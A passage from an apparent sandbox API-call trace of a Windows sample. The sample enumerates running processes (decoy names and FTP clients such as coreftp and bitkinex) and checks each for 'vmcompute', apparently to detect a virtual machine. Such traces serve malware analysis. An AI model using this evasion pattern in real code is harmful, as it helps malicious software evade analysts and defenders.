(lpFirst="swing prefer.exe", lpSrch="vmcompute") returned 0x0 [0102.009] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0102.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.010] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e640 [0102.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x357e640, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0102.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0102.010] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="vmcompute") returned 0x0 [0102.010] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0102.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.012] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f2c0 [0102.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357f2c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0102.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0102.012] StrStrIA (lpFirst="nights-attending.exe", lpSrch="vmcompute") returned 0x0 [0102.012] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0102.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.013] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fea0 [0102.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356fea0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0102.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0102.013] StrStrIA (lpFirst="installed.exe", lpSrch="vmcompute") returned 0x0 [0102.013] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0102.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.014] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e668 [0102.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x357e668, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0102.015] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0102.015] StrStrIA (lpFirst="references compounds.exe", lpSrch="vmcompute") returned 0x0 [0102.015] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0102.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.017] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f2e0 [0102.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357f2e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0102.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0102.018] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="vmcompute") returned 0x0 [0102.018] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0102.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.019] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f300 [0102.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357f300, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0102.019] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0102.019] StrStrIA (lpFirst="registered try.exe", lpSrch="vmcompute") returned 0x0 [0102.019] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0102.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.022] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e690 [0102.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x357e690, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0102.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0102.022] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="vmcompute") returned 0x0 [0102.022] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0102.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.023] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570020 [0102.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3570020, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0102.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0102.024] StrStrIA (lpFirst="invite.exe", lpSrch="vmcompute") returned 0x0 [0102.024] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0102.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0102.025] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570140 [0102.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3570140, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0102.025] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0102.025] StrStrIA (lpFirst="idol.exe", lpSrch="vmcompute") returned 0x0 [0102.025] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.137] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357ec58 [0102.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x357ec58, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0102.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0102.138] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="vmcompute") returned 0x0 [0102.138] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0102.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.139] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357ec08 [0102.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x357ec08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0102.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0102.139] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="vmcompute") returned 0x0 [0102.139] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0102.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.140] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356fff0 [0102.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356fff0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0102.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0102.140] StrStrIA (lpFirst="powell_jane.exe", lpSrch="vmcompute") returned 0x0 [0102.140] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0102.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.142] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f340 [0102.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357f340, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0102.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0102.142] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="vmcompute") returned 0x0 [0102.142] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0102.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.143] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3570008 [0102.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3570008, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0102.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0102.143] StrStrIA (lpFirst="gainedshape.exe", lpSrch="vmcompute") returned 0x0 [0102.143] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0102.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.145] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f360 [0102.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357f360, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0102.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0102.145] StrStrIA (lpFirst="opens-versions.exe", lpSrch="vmcompute") returned 0x0 [0102.145] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0102.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0102.146] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e9b0 [0102.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x357e9b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0102.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0102.146] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="vmcompute") returned 0x0 [0102.146] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0102.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.148] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570050 [0102.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570050, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0102.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0102.148] StrStrIA (lpFirst="3dftp.exe", lpSrch="vmcompute") returned 0x0 [0102.148] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0102.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.149] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f380 [0102.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357f380, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0102.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0102.149] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="vmcompute") returned 0x0 [0102.149] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0102.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.150] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35700c8 [0102.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35700c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0102.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0102.151] StrStrIA (lpFirst="alftp.exe", lpSrch="vmcompute") returned 0x0 [0102.151] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0102.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0102.152] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570068 [0102.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3570068, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0102.152] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0102.152] StrStrIA (lpFirst="barca.exe", lpSrch="vmcompute") returned 0x0 [0102.152] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0102.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.153] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ff18 [0102.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356ff18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0102.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0102.153] StrStrIA (lpFirst="bitkinex.exe", lpSrch="vmcompute") returned 0x0 [0102.153] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0102.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.154] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570158 [0102.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3570158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0102.155] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0102.155] StrStrIA (lpFirst="coreftp.exe", lpSrch="vmcompute") returned 0x0 [0102.155] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0102.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0102.156] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e1f8 [0102.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 